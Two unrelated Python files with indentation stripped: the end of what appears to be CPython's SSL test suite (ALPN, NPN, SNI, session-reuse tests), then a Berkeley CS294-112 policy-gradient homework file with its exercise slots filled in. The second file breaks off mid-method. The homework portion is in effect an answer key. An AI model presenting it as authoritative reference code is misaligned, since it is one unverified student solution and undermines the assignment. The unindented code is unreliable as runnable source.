stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['compression'], None)
def test_dh_params(self):
# Check we can get a connection with ephemeral Diffie-Hellman
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
context.load_dh_params(DHFILE)
context.set_ciphers("kEDH")
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
cipher = stats["cipher"][0]
parts = cipher.split("-")
if "ADH" not in parts and "EDH" not in parts and "DHE" not in parts:
self.fail("Non-DH cipher: " + cipher[0])
def test_selected_alpn_protocol(self):
# selected_alpn_protocol() is None unless ALPN is used.
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support required")
def test_selected_alpn_protocol_if_server_uses_alpn(self):
# selected_alpn_protocol() is None unless ALPN is used by the client.
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_verify_locations(CERTFILE)
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(['foo', 'bar'])
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_alpn_protocol'], None)
@unittest.skipUnless(ssl.HAS_ALPN, "ALPN support needed for this test")
def test_alpn_protocols(self):
server_protocols = ['foo', 'bar', 'milkshake']
protocol_tests = [
(['foo', 'bar'], 'foo'),
(['bar', 'foo'], 'foo'),
(['milkshake'], 'milkshake'),
(['http/3.0', 'http/4.0'], None)
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
server_context.load_cert_chain(CERTFILE)
server_context.set_alpn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1_2)
client_context.load_cert_chain(CERTFILE)
client_context.set_alpn_protocols(client_protocols)
try:
stats = server_params_test(client_context,
server_context,
chatty=True,
connectionchatty=True)
except ssl.SSLError as e:
stats = e
if (expected is None and IS_OPENSSL_1_1
and ssl.OPENSSL_VERSION_INFO < (1, 1, 0, 6)):
# OpenSSL 1.1.0 to 1.1.0e raises handshake error
self.assertIsInstance(stats, ssl.SSLError)
else:
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_alpn_protocol']
self.assertEqual(client_result, expected,
msg % (client_result, "client"))
server_result = stats['server_alpn_protocols'][-1] \
if len(stats['server_alpn_protocols']) else 'nothing'
self.assertEqual(server_result, expected,
msg % (server_result, "server"))
def test_selected_npn_protocol(self):
# selected_npn_protocol() is None unless NPN is used
context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
context.load_cert_chain(CERTFILE)
stats = server_params_test(context, context,
chatty=True, connectionchatty=True)
self.assertIs(stats['client_npn_protocol'], None)
@unittest.skipUnless(ssl.HAS_NPN, "NPN support needed for this test")
def test_npn_protocols(self):
server_protocols = ['http/1.1', 'spdy/2']
protocol_tests = [
(['http/1.1', 'spdy/2'], 'http/1.1'),
(['spdy/2', 'http/1.1'], 'http/1.1'),
(['spdy/2', 'test'], 'spdy/2'),
(['abc', 'def'], 'abc')
]
for client_protocols, expected in protocol_tests:
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(CERTFILE)
server_context.set_npn_protocols(server_protocols)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.load_cert_chain(CERTFILE)
client_context.set_npn_protocols(client_protocols)
stats = server_params_test(client_context, server_context,
chatty=True, connectionchatty=True)
msg = "failed trying %s (s) and %s (c).\n" \
"was expecting %s, but got %%s from the %%s" \
% (str(server_protocols), str(client_protocols),
str(expected))
client_result = stats['client_npn_protocol']
self.assertEqual(client_result, expected, msg % (client_result, "client"))
server_result = stats['server_npn_protocols'][-1] \
if len(stats['server_npn_protocols']) else 'nothing'
self.assertEqual(server_result, expected, msg % (server_result, "server"))
def sni_contexts(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
other_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
other_context.load_cert_chain(SIGNED_CERTFILE2)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
return server_context, other_context, client_context
def check_common_name(self, stats, name):
cert = stats['peercert']
self.assertIn((('commonName', name),), cert['subject'])
@needs_sni
def test_sni_callback(self):
calls = []
server_context, other_context, client_context = self.sni_contexts()
def servername_cb(ssl_sock, server_name, initial_context):
calls.append((server_name, initial_context))
if server_name is not None:
ssl_sock.context = other_context
server_context.set_servername_callback(servername_cb)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='supermessage')
# The hostname was fetched properly, and the certificate was
# changed for the connection.
self.assertEqual(calls, [("supermessage", server_context)])
        # The certificate from other_context (CN 'fakehostname') was selected
self.check_common_name(stats, 'fakehostname')
calls = []
# The callback is called with server_name=None
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name=None)
self.assertEqual(calls, [(None, server_context)])
self.check_common_name(stats, 'localhost')
# Check disabling the callback
calls = []
server_context.set_servername_callback(None)
stats = server_params_test(client_context, server_context,
chatty=True,
sni_name='notfunny')
# Certificate didn't change
self.check_common_name(stats, 'localhost')
self.assertEqual(calls, [])
@needs_sni
def test_sni_callback_alert(self):
# Returning a TLS alert is reflected to the connecting client
server_context, other_context, client_context = self.sni_contexts()
def cb_returning_alert(ssl_sock, server_name, initial_context):
return ssl.ALERT_DESCRIPTION_ACCESS_DENIED
server_context.set_servername_callback(cb_returning_alert)
with self.assertRaises(ssl.SSLError) as cm:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_ACCESS_DENIED')
@needs_sni
def test_sni_callback_raising(self):
# Raising fails the connection with a TLS handshake failure alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_raising(ssl_sock, server_name, initial_context):
1/0
server_context.set_servername_callback(cb_raising)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'SSLV3_ALERT_HANDSHAKE_FAILURE')
self.assertIn("ZeroDivisionError", stderr.getvalue())
@needs_sni
def test_sni_callback_wrong_return_type(self):
# Returning the wrong return type terminates the TLS connection
# with an internal error alert.
server_context, other_context, client_context = self.sni_contexts()
def cb_wrong_return_type(ssl_sock, server_name, initial_context):
return "foo"
server_context.set_servername_callback(cb_wrong_return_type)
with self.assertRaises(ssl.SSLError) as cm, \
support.captured_stderr() as stderr:
stats = server_params_test(client_context, server_context,
chatty=False,
sni_name='supermessage')
self.assertEqual(cm.exception.reason, 'TLSV1_ALERT_INTERNAL_ERROR')
self.assertIn("TypeError", stderr.getvalue())
def test_shared_ciphers(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
if ssl.OPENSSL_VERSION_INFO >= (1, 0, 2):
client_context.set_ciphers("AES128:AES256")
server_context.set_ciphers("AES256")
alg1 = "AES256"
alg2 = "AES-256"
else:
client_context.set_ciphers("AES:3DES")
server_context.set_ciphers("3DES")
alg1 = "3DES"
alg2 = "DES-CBC3"
stats = server_params_test(client_context, server_context)
ciphers = stats['server_shared_ciphers'][0]
self.assertGreater(len(ciphers), 0)
for name, tls_version, bits in ciphers:
if not alg1 in name.split("-") and alg2 not in name:
self.fail(name)
def test_read_write_after_close_raises_valuerror(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
s = context.wrap_socket(socket.socket())
s.connect((HOST, server.port))
s.close()
self.assertRaises(ValueError, s.read, 1024)
self.assertRaises(ValueError, s.write, b'hello')
def test_sendfile(self):
TEST_DATA = b"x" * 512
with open(support.TESTFN, 'wb') as f:
f.write(TEST_DATA)
self.addCleanup(support.unlink, support.TESTFN)
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
with open(support.TESTFN, 'rb') as file:
s.sendfile(file)
self.assertEqual(s.recv(1024), TEST_DATA)
def test_session(self):
server_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
server_context.load_cert_chain(SIGNED_CERTFILE)
client_context = ssl.SSLContext(ssl.PROTOCOL_TLSv1)
client_context.verify_mode = ssl.CERT_REQUIRED
client_context.load_verify_locations(SIGNING_CA)
# first connection without session
stats = server_params_test(client_context, server_context)
session = stats['session']
self.assertTrue(session.id)
self.assertGreater(session.time, 0)
self.assertGreater(session.timeout, 0)
self.assertTrue(session.has_ticket)
if ssl.OPENSSL_VERSION_INFO > (1, 0, 1):
self.assertGreater(session.ticket_lifetime_hint, 0)
self.assertFalse(stats['session_reused'])
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 1)
self.assertEqual(sess_stat['hits'], 0)
# reuse session
stats = server_params_test(client_context, server_context, session=session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 2)
self.assertEqual(sess_stat['hits'], 1)
self.assertTrue(stats['session_reused'])
session2 = stats['session']
self.assertEqual(session2.id, session.id)
self.assertEqual(session2, session)
self.assertIsNot(session2, session)
self.assertGreaterEqual(session2.time, session.time)
self.assertGreaterEqual(session2.timeout, session.timeout)
# another one without session
stats = server_params_test(client_context, server_context)
self.assertFalse(stats['session_reused'])
session3 = stats['session']
self.assertNotEqual(session3.id, session.id)
self.assertNotEqual(session3, session)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 3)
self.assertEqual(sess_stat['hits'], 1)
# reuse session again
stats = server_params_test(client_context, server_context, session=session)
self.assertTrue(stats['session_reused'])
session4 = stats['session']
self.assertEqual(session4.id, session.id)
self.assertEqual(session4, session)
self.assertGreaterEqual(session4.time, session.time)
self.assertGreaterEqual(session4.timeout, session.timeout)
sess_stat = server_context.session_stats()
self.assertEqual(sess_stat['accept'], 4)
self.assertEqual(sess_stat['hits'], 2)
def test_session_handling(self):
context = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context.verify_mode = ssl.CERT_REQUIRED
context.load_verify_locations(CERTFILE)
context.load_cert_chain(CERTFILE)
context2 = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
context2.verify_mode = ssl.CERT_REQUIRED
context2.load_verify_locations(CERTFILE)
context2.load_cert_chain(CERTFILE)
server = ThreadedEchoServer(context=context, chatty=False)
with server:
with context.wrap_socket(socket.socket()) as s:
# session is None before handshake
self.assertEqual(s.session, None)
self.assertEqual(s.session_reused, None)
s.connect((HOST, server.port))
session = s.session
self.assertTrue(session)
with self.assertRaises(TypeError) as e:
s.session = object
self.assertEqual(str(e.exception), 'Value is not a SSLSession.')
with context.wrap_socket(socket.socket()) as s:
s.connect((HOST, server.port))
# cannot set session after handshake
with self.assertRaises(ValueError) as e:
s.session = session
self.assertEqual(str(e.exception),
'Cannot set session after handshake.')
with context.wrap_socket(socket.socket()) as s:
# can set session before handshake and before the
# connection was established
s.session = session
s.connect((HOST, server.port))
self.assertEqual(s.session.id, session.id)
self.assertEqual(s.session, session)
self.assertEqual(s.session_reused, True)
with context2.wrap_socket(socket.socket()) as s:
# cannot re-use session with a different SSLContext
with self.assertRaises(ValueError) as e:
s.session = session
s.connect((HOST, server.port))
self.assertEqual(str(e.exception),
'Session refers to a different SSLContext.')
def test_main(verbose=False):
if support.verbose:
import warnings
plats = {
'Linux': platform.linux_distribution,
'Mac': platform.mac_ver,
'Windows': platform.win32_ver,
}
with warnings.catch_warnings():
warnings.filterwarnings(
'ignore',
r'dist\(\) and linux_distribution\(\) '
'functions are deprecated .*',
PendingDeprecationWarning,
)
for name, func in plats.items():
plat = func()
if plat and plat[0]:
plat = '%s %r' % (name, plat)
break
else:
plat = repr(platform.platform())
print("test_ssl: testing with %r %r" %
(ssl.OPENSSL_VERSION, ssl.OPENSSL_VERSION_INFO))
print(" under %s" % plat)
print(" HAS_SNI = %r" % ssl.HAS_SNI)
print(" OP_ALL = 0x%8x" % ssl.OP_ALL)
try:
print(" OP_NO_TLSv1_1 = 0x%8x" % ssl.OP_NO_TLSv1_1)
except AttributeError:
pass
for filename in [
CERTFILE, BYTES_CERTFILE,
ONLYCERT, ONLYKEY, BYTES_ONLYCERT, BYTES_ONLYKEY,
SIGNED_CERTFILE, SIGNED_CERTFILE2, SIGNING_CA,
BADCERT, BADKEY, EMPTYCERT]:
if not os.path.exists(filename):
raise support.TestFailed("Can't read certificate file %r" % filename)
tests = [
ContextTests, BasicSocketTests, SSLErrorTests, MemoryBIOTests,
SimpleBackgroundTests,
]
if support.is_resource_enabled('network'):
tests.append(NetworkedTests)
if _have_threads:
thread_info = support.threading_setup()
if thread_info:
tests.append(ThreadedTests)
try:
support.run_unittest(*tests)
finally:
if _have_threads:
support.threading_cleanup(*thread_info)
if __name__ == "__main__":
test_main()
|
train_pg_f18.py
|
"""
Original code from John Schulman for CS294 Deep Reinforcement Learning Spring 2017
Adapted for CS294-112 Fall 2017 by Abhishek Gupta and Joshua Achiam
Adapted for CS294-112 Fall 2018 by Michael Chang and Soroush Nasiriany
"""
import numpy as np
import tensorflow as tf
import os, gym, logz, time, inspect
from multiprocessing import Process
#============================================================================================#
# Utilities
#============================================================================================#
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def build_mlp(input_placeholder, output_size, scope, n_layers, size, activation=tf.tanh, output_activation=None):
"""
Builds a feedforward neural network
arguments:
input_placeholder: placeholder variable for the state (batch_size, input_size)
output_size: size of the output layer
scope: variable scope of the network
n_layers: number of hidden layers
size: dimension of the hidden layer
activation: activation of the hidden layers
            output_activation: activation of the output layer
returns:
output placeholder of the network (the result of a forward pass)
Hint: use tf.layers.dense
"""
# YOUR CODE HERE
with tf.variable_scope(scope):
x = input_placeholder
for i in range(n_layers):
x = tf.layers.dense(x, size, activation=activation)
x = tf.layers.dense(x, output_size, activation=output_activation)
return x
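# A minimal usage sketch (hypothetical placeholder name and sizes, for illustration only):
#     obs_ph = tf.placeholder(tf.float32, shape=[None, 4])
#     logits = build_mlp(obs_ph, output_size=2, scope="policy", n_layers=2, size=64)
# This yields a (batch_size, 2) tensor: two tanh hidden layers of width 64 followed
# by a linear output layer.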
def pathlength(path):
return len(path["reward"])
def setup_logger(logdir, locals_):
# Configure output directory for logging
logz.configure_output_dir(logdir)
# Log experimental parameters
    args = inspect.getfullargspec(train_PG).args  # getargspec is deprecated in Python 3
params = {k: locals_[k] if k in locals_ else None for k in args}
logz.save_params(params)
#============================================================================================#
# Policy Gradient
#============================================================================================#
class Agent(object):
def __init__(self, computation_graph_args, sample_trajectory_args, estimate_return_args):
super(Agent, self).__init__()
self.ob_dim = computation_graph_args['ob_dim']
self.ac_dim = computation_graph_args['ac_dim']
self.discrete = computation_graph_args['discrete']
self.size = computation_graph_args['size']
self.n_layers = computation_graph_args['n_layers']
self.learning_rate = computation_graph_args['learning_rate']
self.animate = sample_trajectory_args['animate']
self.max_path_length = sample_trajectory_args['max_path_length']
self.min_timesteps_per_batch = sample_trajectory_args['min_timesteps_per_batch']
self.gamma = estimate_return_args['gamma']
self.reward_to_go = estimate_return_args['reward_to_go']
self.nn_baseline = estimate_return_args['nn_baseline']
self.normalize_advantages = estimate_return_args['normalize_advantages']
def init_tf_sess(self):
tf_config = tf.ConfigProto(inter_op_parallelism_threads=1, intra_op_parallelism_threads=1)
tf_config.gpu_options.allow_growth = True
self.sess = tf.Session(config=tf_config)
self.sess.__enter__() # equivalent to `with self.sess:`
tf.global_variables_initializer().run() #pylint: disable=E1101
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def define_placeholders(self):
"""
        Placeholders for batched observations / actions / advantages in the policy gradient
loss function.
See Agent.build_computation_graph for notation
returns:
sy_ob_no: placeholder for observations
sy_ac_na: placeholder for actions
sy_adv_n: placeholder for advantages
"""
sy_ob_no = tf.placeholder(shape=[None, self.ob_dim], name="ob", dtype=tf.float32)
if self.discrete:
sy_ac_na = tf.placeholder(shape=[None], name="ac", dtype=tf.int32)
else:
sy_ac_na = tf.placeholder(shape=[None, self.ac_dim], name="ac", dtype=tf.float32)
# YOUR CODE HERE
sy_adv_n = tf.placeholder(shape=[None], name='adv', dtype=tf.float32)
return sy_ob_no, sy_ac_na, sy_adv_n
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def policy_forward_pass(self, sy_ob_no):
""" Constructs the symbolic operation for the policy network outputs,
which are the parameters of the policy distribution p(a|s)
arguments:
sy_ob_no: (batch_size, self.ob_dim)
returns:
the parameters of the policy.
if discrete, the parameters are the logits of a categorical distribution
over the actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous, the parameters are a tuple (mean, log_std) of a Gaussian
distribution over actions. log_std should just be a trainable
variable, not a network output.
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
Hint: use the 'build_mlp' function to output the logits (in the discrete case)
and the mean (in the continuous case).
Pass in self.n_layers for the 'n_layers' argument, and
pass in self.size for the 'size' argument.
"""
if self.discrete:
# YOUR_CODE_HERE
sy_logits_na = build_mlp(sy_ob_no, self.ac_dim, "discrete", self.n_layers, self.size)
return sy_logits_na
else:
# YOUR_CODE_HERE
sy_mean = build_mlp(sy_ob_no, self.ac_dim, "continuous", self.n_layers, self.size)
sy_logstd = tf.get_variable("std", [self.ac_dim], dtype=tf.float32)
return (sy_mean, sy_logstd)
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def sample_action(self, policy_parameters):
""" Constructs a symbolic operation for stochastically sampling from the policy
distribution
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
returns:
sy_sampled_ac:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
Hint: for the continuous case, use the reparameterization trick:
The output from a Gaussian distribution with mean 'mu' and std 'sigma' is
mu + sigma * z, z ~ N(0, I)
This reduces the problem to just sampling z. (Hint: use tf.random_normal!)
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
sy_sampled_ac = tf.reshape(tf.multinomial(sy_logits_na, 1), [-1])
else:
sy_mean, sy_logstd = policy_parameters
# YOUR_CODE_HERE
sy_sampled_ac = tf.random_normal(tf.shape(sy_mean)) * tf.exp(sy_logstd) + sy_mean
return sy_sampled_ac
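        # Reparameterization sketch: a draw from N(mu, diag(sigma^2)) is mu + sigma * z
        # with z ~ N(0, I), so only z needs to be sampled. A numpy analogue of the
        # continuous branch above (illustration only):
        #     z = np.random.randn(*mu.shape)
        #     a = mu + np.exp(log_std) * z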
#========================================================================================#
# ----------PROBLEM 2----------
#========================================================================================#
def get_log_prob(self, policy_parameters, sy_ac_na):
""" Constructs a symbolic operation for computing the log probability of a set of actions
that were actually taken according to the policy
arguments:
policy_parameters
if discrete: logits of a categorical distribution over actions
sy_logits_na: (batch_size, self.ac_dim)
if continuous: (mean, log_std) of a Gaussian distribution over actions
sy_mean: (batch_size, self.ac_dim)
sy_logstd: (self.ac_dim,)
sy_ac_na:
if discrete: (batch_size,)
if continuous: (batch_size, self.ac_dim)
returns:
sy_logprob_n: (batch_size)
Hint:
For the discrete case, use the log probability under a categorical distribution.
For the continuous case, use the log probability under a multivariate gaussian.
"""
if self.discrete:
sy_logits_na = policy_parameters
# YOUR_CODE_HERE
sy_logprob_n = -tf.nn.sparse_softmax_cross_entropy_with_logits(labels=sy_ac_na, logits=sy_logits_na)
else:
sy_mean, sy_logstd = policy_parameters
            # YOUR_CODE_HERE
            # Equivalently: tf.contrib.distributions.MultivariateNormalDiag(loc=sy_mean, scale_diag=tf.exp(sy_logstd)).log_prob(sy_ac_na)
            # Diagonal-Gaussian log density, dropping only the constant (k/2)*log(2*pi)
            # term; the -sum(log_std) term is kept because sy_logstd is trainable.
            sy_logprob_n = -0.5 * tf.reduce_sum(tf.square((sy_ac_na - sy_mean) / tf.exp(sy_logstd)), axis=1) - tf.reduce_sum(sy_logstd)
return sy_logprob_n
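        # For reference, the full diagonal-Gaussian log density is
        #     log p(a) = -0.5 * sum_i ((a_i - mu_i) / sigma_i)^2 - sum_i log(sigma_i) - (k/2) * log(2*pi)
        # Only the constant (k/2)*log(2*pi) term can be dropped safely: it has zero
        # gradient with respect to both the mean network and the trainable log-std.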
def build_computation_graph(self):
"""
Notes on notation:
Symbolic variables have the prefix sy_, to distinguish them from the numerical values
that are computed later in the function
Prefixes and suffixes:
ob - observation
ac - action
            _no - this tensor should have shape (batch size /n/, observation dim)
            _na - this tensor should have shape (batch size /n/, action dim)
            _n  - this tensor should have shape (batch size /n/)
        Note: batch size /n/ is defined at runtime, and until then, the shape for that axis
        is None
----------------------------------------------------------------------------------
loss: a function of self.sy_logprob_n and self.sy_adv_n that we will differentiate
to get the policy gradient.
"""
self.sy_ob_no, self.sy_ac_na, self.sy_adv_n = self.define_placeholders()
# The policy takes in an observation and produces a distribution over the action space
self.policy_parameters = self.policy_forward_pass(self.sy_ob_no)
# We can sample actions from this action distribution.
# This will be called in Agent.sample_trajectory() where we generate a rollout.
self.sy_sampled_ac = self.sample_action(self.policy_parameters)
# We can also compute the logprob of the actions that were actually taken by the policy
# This is used in the loss function.
self.sy_logprob_n = self.get_log_prob(self.policy_parameters, self.sy_ac_na)
#========================================================================================#
# ----------PROBLEM 2----------
# Loss Function and Training Operation
#========================================================================================#
loss = -tf.reduce_mean(self.sy_logprob_n * self.sy_adv_n) # YOUR CODE HERE
self.update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(loss)
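        # The minus sign turns gradient *ascent* on E[log pi(a|s) * adv] into gradient
        # *descent* on `loss`, which is what AdamOptimizer.minimize performs.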
#========================================================================================#
# ----------PROBLEM 6----------
# Optional Baseline
#
# Define placeholders for targets, a loss function and an update op for fitting a
# neural network baseline. These will be used to fit the neural network baseline.
#========================================================================================#
if self.nn_baseline:
self.baseline_prediction = tf.squeeze(build_mlp(
self.sy_ob_no,
1,
"nn_baseline",
n_layers=self.n_layers,
size=self.size))
# YOUR_CODE_HERE
self.sy_target_n = tf.placeholder(shape=[None], name="baseline", dtype=tf.float32)
baseline_loss = tf.nn.l2_loss(self.baseline_prediction - self.sy_target_n)
self.baseline_update_op = tf.train.AdamOptimizer(self.learning_rate).minimize(baseline_loss)
def sample_trajectories(self, itr, env):
# Collect paths until we have enough timesteps
timesteps_this_batch = 0
paths = []
while True:
            animate_this_episode = (len(paths) == 0 and (itr % 10 == 0) and self.animate)
path = self.sample_trajectory(env, animate_this_episode)
paths.append(path)
timesteps_this_batch += pathlength(path)
if timesteps_this_batch > self.min_timesteps_per_batch:
break
return paths, timesteps_this_batch
def sample_trajectory(self, env, animate_this_episode):
ob = env.reset()
obs, acs, rewards = [], [], []
steps = 0
while True:
if animate_this_episode:
env.render()
time.sleep(0.1)
obs.append(ob)
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
            ac = self.sess.run(self.sy_sampled_ac, feed_dict={self.sy_ob_no: ob[None]}) # YOUR CODE HERE; ob[None] adds a leading batch axis
ac = ac[0]
acs.append(ac)
ob, rew, done, _ = env.step(ac)
rewards.append(rew)
steps += 1
if done or steps > self.max_path_length:
break
path = {"observation" : np.array(obs, dtype=np.float32),
"reward" : np.array(rewards, dtype=np.float32),
"action" : np.array(acs, dtype=np.float32)}
return path
#====================================================================================#
# ----------PROBLEM 3----------
#====================================================================================#
def sum_of_rewards(self, re_n):
"""
Monte Carlo estimation of the Q function.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
----------------------------------------------------------------------------------
Your code should construct numpy arrays for Q-values which will be used to compute
advantages (which will in turn be fed to the placeholder you defined in
Agent.define_placeholders).
Recall that the expression for the policy gradient PG is
PG = E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * (Q_t - b_t )]
where
tau=(s_0, a_0, ...) is a trajectory,
Q_t is the Q-value at time t, Q^{pi}(s_t, a_t),
and b_t is a baseline which may depend on s_t.
You will write code for two cases, controlled by the flag 'reward_to_go':
Case 1: trajectory-based PG
(reward_to_go = False)
Instead of Q^{pi}(s_t, a_t), we use the total discounted reward summed over
entire trajectory (regardless of which time step the Q-value should be for).
For this case, the policy gradient estimator is
E_{tau} [sum_{t=0}^T grad log pi(a_t|s_t) * Ret(tau)]
where
Ret(tau) = sum_{t'=0}^T gamma^t' r_{t'}.
Thus, you should compute
Q_t = Ret(tau)
Case 2: reward-to-go PG
(reward_to_go = True)
Here, you estimate Q^{pi}(s_t, a_t) by the discounted sum of rewards starting
from time step t. Thus, you should compute
Q_t = sum_{t'=t}^T gamma^(t'-t) * r_{t'}
Store the Q-values for all timesteps and all trajectories in a variable 'q_n',
like the 'ob_no' and 'ac_na' above.
"""
# YOUR_CODE_HERE
q_n = []
for r in re_n:
T = len(r)
if self.reward_to_go:
q_n += [(np.power(self.gamma, np.arange(T - t)) * r[t:]).sum() for t in range(T)]
            else:
                # The full discounted return is identical for every t on this path,
                # so compute it once and repeat it T times.
                ret = (np.power(self.gamma, np.arange(T)) * r).sum()
                q_n += [ret] * T
return np.array(q_n)
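    # Worked example (r = [1, 1, 1], gamma = 0.5):
    #   reward_to_go = False: Ret(tau) = 1 + 0.5 + 0.25 = 1.75, so q_n = [1.75, 1.75, 1.75]
    #   reward_to_go = True:  q_n = [1.75, 1.5, 1.0]  (each Q_t sums discounted rewards from t on)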
def compute_advantage(self, ob_no, q_n):
"""
Computes advantages by (possibly) subtracting a baseline from the estimated Q values
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
returns:
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Computing Baselines
#====================================================================================#
if self.nn_baseline:
# If nn_baseline is True, use your neural network to predict reward-to-go
# at each timestep for each trajectory, and save the result in a variable 'b_n'
# like 'ob_no', 'ac_na', and 'q_n'.
#
# Hint #bl1: rescale the output from the nn_baseline to match the statistics
# (mean and std) of the current batch of Q-values. (Goes with Hint
# #bl2 in Agent.update_parameters.
b_n = self.sess.run(self.baseline_prediction, feed_dict={self.sy_ob_no: ob_no}) # YOUR CODE HERE
adv_n = q_n - (b_n * q_n.std(axis=0) + q_n.mean(axis=0))
else:
adv_n = q_n.copy()
return adv_n
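    # Note on the rescaling above (Hint #bl1): the baseline network is fit to
    # *normalized* targets (mean 0, std 1; see Agent.update_parameters), so its raw
    # prediction b_n is mapped back onto the scale of the current batch of Q-values
    # via b_n * q_n.std() + q_n.mean() before being subtracted.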
def estimate_return(self, ob_no, re_n):
"""
Estimates the returns over a set of trajectories.
let sum_of_path_lengths be the sum of the lengths of the paths sampled from
Agent.sample_trajectories
let num_paths be the number of paths sampled from Agent.sample_trajectories
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
re_n: length: num_paths. Each element in re_n is a numpy array
containing the rewards for the particular path
returns:
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
"""
q_n = self.sum_of_rewards(re_n)
adv_n = self.compute_advantage(ob_no, q_n)
#====================================================================================#
# ----------PROBLEM 3----------
# Advantage Normalization
#====================================================================================#
if self.normalize_advantages:
# On the next line, implement a trick which is known empirically to reduce variance
# in policy gradient methods: normalize adv_n to have mean zero and std=1.
adv_n = (adv_n - adv_n.mean(axis=0)) / (adv_n.std(axis=0) + 1e-7) # YOUR_CODE_HERE
return q_n, adv_n
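    # Toy check of the normalization above: adv_n = [1., 2., 3.] has mean 2 and
    # std ~0.816, so the normalized advantages are about [-1.22, 0., 1.22]
    # (zero mean, unit std).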
def update_parameters(self, ob_no, ac_na, q_n, adv_n):
"""
Update the parameters of the policy and (possibly) the neural network baseline,
which is trained to approximate the value function.
arguments:
ob_no: shape: (sum_of_path_lengths, ob_dim)
ac_na: shape: (sum_of_path_lengths).
q_n: shape: (sum_of_path_lengths). A single vector for the estimated q values
whose length is the sum of the lengths of the paths
adv_n: shape: (sum_of_path_lengths). A single vector for the estimated
advantages whose length is the sum of the lengths of the paths
returns:
nothing
"""
#====================================================================================#
# ----------PROBLEM 6----------
# Optimizing Neural Network Baseline
#====================================================================================#
if self.nn_baseline:
